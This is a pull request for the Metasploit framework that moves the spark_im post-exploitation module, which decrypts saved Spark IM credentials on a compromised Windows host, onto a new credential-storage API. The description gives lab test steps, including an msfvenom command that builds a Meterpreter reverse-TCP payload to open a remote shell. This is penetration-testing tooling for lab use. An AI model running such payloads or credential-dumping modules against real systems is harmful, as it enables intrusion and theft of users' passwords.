### PR TITLE
Update spark_im to use the new cred API

### DIFF
--- a/modules/post/windows/gather/credentials/spark_im.rb
+++ b/modules/post/windows/gather/credentials/spark_im.rb
@@ -49,30 +49,54 @@ class Metasploit3 < Msf::Post
     password = ::Rex::Text.to_utf8(password)
 
     user, pass = password.scan(/[[:print:]]+/)
+    cred_opts = {}
     if pass.nil? or pass.empty?
       print_status("Username found: #{user}, but no password")
-      pass = ''
+      cred_opts.merge!(user: user)
     else
       print_good("Decrypted Username #{user} Password: #{pass}")
+      cred_opts.merge!(user: user, password: pass)
     end
 
-    store_creds(user, pass)
+    cred_opts.merge!(
+      ip: client.sock.peerhost,
+      port: 5222,
+      service_name: 'spark'
+    )
+
+    report_cred(cred_opts)
   end
 
-  def store_creds(user, pass)
-    if db
-      report_auth_info(
-        :host   => client.sock.peerhost,
-        :port   => 5222,
-        :ptype  => 'password',
-        :sname  => 'spark',
-        :user   => user,
-        :pass   => pass,
-        :duplicate_ok => true,
-        :active => true
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      module_fullname: fullname,
+      post_reference_name: self.refname,
+      session_id: session_db_id,
+      origin_type: :session,
+      username: opts[:user],
+      private_type: :password
+    }.merge(service_data)
+
+    if opts[:password]
+      credential_data.merge!(
+        private_data: opts[:password],
       )
-      print_status("Loot stored in the db")
     end
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED,
+    }.merge(service_data)
+
+    create_credential_login(login_data)
   end
 
   # main control method


### PR DESCRIPTION
This patch updates the spark_im post module to use the latest credential API.
- [x] Get a Windows 7 box
- [x] Download [.Net 4 framework](http://download.microsoft.com/download/9/5/A/95A9616B-7A37-4AF6-BC36-D6EA96C8DAAE/dotNetFx40_Full_x86_x64.exe), and install it
- [x] Download [Python-3.4.2](https://www.python.org/ftp/python/3.4.2/python-3.4.2.msi), and install it
- [x] Download [MySQL for Windows](http://cdn.mysql.com/Downloads/MySQLInstaller/mysql-installer-community-5.6.25.0.msi), and install it
- [x] Open a MySQL client, and create a database. Like this: `create database openfire;`
- [x] Download [OpenFire](http://download.igniterealtime.org/openfire/openfire_3_10_0.exe), and install it. You will need to configure it with the OpenFire Admin Web Console too. Use MySQL as your database server. Use `openfire` name as your database.
- [x] Download [Spark IM client](http://download.igniterealtime.org/spark/spark_2_7_0.exe) and install it.
- [x] Open Spark IM. There's a button that says "Accounts", click on that
- [x] You will see the following. Enter a username, password, and server (127.0.0.1):

![screen shot 2015-06-02 at 12 20 36 pm](https://cloud.githubusercontent.com/assets/1170914/7942160/ebbb1afa-0921-11e5-909a-5c7b31d7ad6a.png)
- [x] Back to the Spark IM login, enter the user/pass/server you just created. And you should be able to login.
- [x] Start msfconsole
- [x] Do: `workspace -a spark_im`
- [x] Do: `use exploit/multi/handler`
- [x] Do: `run`
- [x] Create a payload exe: `./msfvenom -p windows/meterpreter/reverse_tcp lhost=[Your IP] lport=4444 -f exe -o /tmp/payload.exe`
- [x] Drag and drop payload.exe to the Windows box. Double-click on it to get a shell.
- [x] At the meterpreter prompt, do: `run post/windows/gather/credentials/spark_im`
- [x] The spark_im module should tell you that it has decrypted the password.
- [x] At the meterpreter prompt, do: `background`
- [x] Do: `creds`, and you should see that the cred (or creds) are saved on the database.
